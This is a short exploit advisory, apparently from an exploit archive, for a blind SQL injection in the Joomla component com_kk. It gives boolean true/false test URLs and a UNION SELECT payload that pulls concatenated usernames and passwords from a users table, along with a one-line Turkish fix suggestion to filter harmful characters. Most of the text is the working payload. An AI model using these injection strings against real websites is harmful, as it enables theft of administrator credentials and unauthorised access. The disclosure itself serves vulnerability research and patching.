id: 10618
date: 01/06/2010
title: Joomla Component com_kk Blind SQL Injection Vulnerability
author: Pyske
cves: 

=========================================================
Joomla Component com_kk Blind SQL Injection Vulnerability
=========================================================

<------------------- header data start ------------------- >
 
#############################################################
# Joomla Component com_kk Blind SQL Injection Vulnerability
#############################################################
 
# Author : Pyske | Bug Researchers
 
 
# Name : com_kk
 
 
# Bug Type : Blind SQL Injection
 
 
# Infection : Admin login bilgileri alinabilir.
 
 
# Demo Vuln. :
 
TRUE(+)
 
http://localhost/index.php?option=com_kk&kat=1 and 1=1
 
FALSE(-)
 
http://localhost/index.php?option=com_kk&kat=1 and 1=0
 
# Bug Fix Advice : Zararli karakterler filtrelenmelidir.
 
#############################################################
 
< ------------------- header data end of ------------------- >
 
< -- bug code start -- >
 
path /index.php?option=com_kk&kat=1/**/and/**/1=0/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/klhtrade_users
 
< -- bug code end of -- >



#  0day.today [2023-03-24]  #